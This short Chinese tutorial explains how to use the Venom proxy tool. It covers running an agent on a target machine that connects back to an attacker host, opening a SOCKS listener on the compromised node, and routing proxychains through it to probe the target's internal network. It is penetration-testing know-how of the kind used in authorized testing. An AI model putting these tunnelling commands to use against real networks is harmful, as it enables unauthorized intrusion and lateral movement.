编译好的可执行文件:https://github.com/Dliv3/Venom/releases
admin监听端口,agent发起连接:
./admin_linux_x64 -lport 9999 # 攻击机开启监听 ./agent_linux_x64 -rhost 192.168.1.100 -rport 9999 # 目标机发起连接
讯享网
agent监听端口,admin发起连接:
讯享网./agent_linux_x64 -lport 8888 ./admin_linux_x64 -rhost 192.168.1.100 -rport 8888
进入目标内网上传agent_linux_x64
chmod u+x agent_linux_x64 ./agent_linux_x64 -rhost 192.168.1.100 -rport 9999

成功连接攻击机
通过show命令发现节点1

进入节点1(相当于路由 172.17.0.0/24)
在此节点启动socks监听:
讯享网goto 1 socks 1080
还可在节点1上监听其他
修改proxychains配置文件:
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
下面就可以用proxychains进行内网探测了。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/117566.html